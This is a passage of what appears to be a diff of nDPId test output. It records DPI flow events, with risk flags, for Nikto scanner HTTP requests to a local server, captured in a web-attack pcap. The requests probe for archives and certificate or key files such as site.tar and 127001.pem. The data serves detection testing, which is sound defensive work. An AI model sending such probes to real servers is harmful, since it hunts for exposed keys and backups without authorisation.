+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1576420276871,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276871,"pkt":"AAAAAAAAAAAAAAAACABFAADAmdRAAEAGomF\/AAABfwAAAcKMH5DqwaGU3VMvd4AYAED+tAAAAQEICp1m+6+dZvuvR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1576420276872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276872,"pkt":"AAAAAAAAAAAAAAAACABFAADFFSZAAEAGJwt\/AAABfwAAAcKOH5D96y1nB6jLDIAYAED+uQAAAQEICp1m+7CdZvuwR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1576420276873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276873,"pkt":"AAAAAAAAAAAAAAAACABFAADFhm9AAEAGtcF\/AAABfwAAAcKQH5BNzL4wefiP1IAYAED+uQAAAQEICp1m+7GdZvuxR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1576420276874,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276874,"pkt":"AAAAAAAAAAAAAAAACABFAADCE1BAAEAGKOR\/AAABfwAAAcKSH5DnJisNBZiCk4AYAED+tgAAAQEICp1m+7KdZvuyR0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1576420276876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276876,"pkt":"AAAAAAAAAAAAAAAACABFAADCnWxAAEAGnsd\/AAABfwAAAcKUH5Co\/aUqs\/1iGoAYAED+tgAAAQEICp1m+7SdZvu0R0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1576420276877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276877,"pkt":"AAAAAAAAAAAAAAAACABFAADAt7lAAEAGhHx\/AAABfwAAAcKWH5CQPI\/1lm3rwoAYAED+tAAAAQEICp1m+7WdZvu1R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1576420276879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276879,"pkt":"AAAAAAAAAAAAAAAACABFAADAhf9AAEAGtjZ\/AAABfwAAAcKYH5Cnmb2\/tsRlFIAYAED+tAAAAQEICp1m+7edZvu2R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1576420276881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276881,"pkt":"AAAAAAAAAAAAAAAACABFAADADYtAAEAGLqt\/AAABfwAAAcKaH5CHzTXOE9kNb4AYAED+tAAAAQEICp1m+7mdZvu5R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 